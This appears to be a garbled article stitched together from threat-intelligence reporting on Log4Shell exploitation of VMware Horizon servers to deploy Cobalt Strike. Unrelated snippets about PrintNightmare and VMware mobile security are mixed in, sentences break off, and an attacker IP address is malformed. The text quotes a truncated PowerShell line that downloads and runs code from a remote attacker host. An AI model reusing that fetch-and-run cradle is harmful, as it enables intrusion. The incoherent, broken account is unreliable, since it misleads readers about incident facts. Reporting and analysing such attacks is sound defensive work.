Since December 2021, multiple threat actor. The vulnerability, dubbed PrintNightmare and tracked as CVE-2021-34527, is located in the Windows Print Spooler service and the public exploits available for it are being improved.

This new EDR capability is based on an acquisition we made in early 2021 and allows us to proactively detect and respond to non-persistent malicious behavior by giving us the ability to collect detailed information about processes.

Cybersecurity and Infrastructure Security Agency (CISA), along with the Coast Guard Cyber Command (CGCYBER), on Thursday released a joint advisory warning of continued attempts on the part of threat actors to exploit the Log4Shell flaw in VMware Horizon servers to breach target networks. Huntress reports that attackers have started to exploit the Log4Shell vulnerabilities revealed in December 2021 on servers running VMware Horizon to deploy Cobalt Strike.

Iex ((New-Object ).DownloadString('116:8080/drv'))

At 1938 ET, we started deploying Huntress' soon-to-be-released Process Insights agent to all of the VMware Horizon servers we protect.

VMware’s mobile device security Workspace ONE Mobile Threat Defense (MTD), powered by Lookout, integrates with Workspace ONE in a unique way with the key services of the suite, Unified Endpoint Management (UEM) and Intelligence, and most importantly is embedded within the Intelligence Hub agent to form a robust endpoint protection suite onto these.

These two hosts were from two different partners, but the commonality was VMware Horizon server.

Additional security researchers, including TheDFIRReport and Red Canary, reported similar behavior around the same time, confirming a PowerShell-based downloader executed a Cobalt Strike payload that was configured to call back to 185.112.83116 for command and control. Days later, threat actors were installing Cobalt Strike implants in multiple VMware Horizon servers.

At 1518 ET another Managed Antivirus detection for Cobalt Strike on another host was identified. Log4Shell vulnerabilities in VMware Horizon were exploited to create web shells in January 2022, less than a month after the vendor issued security updates following initial Log4j vulnerability disclosures. On January 14 at 1458 ET, an unrelated Managed Antivirus detection (Microsoft Defender) tipped our ThreatOps team to a Cobalt Strike implant.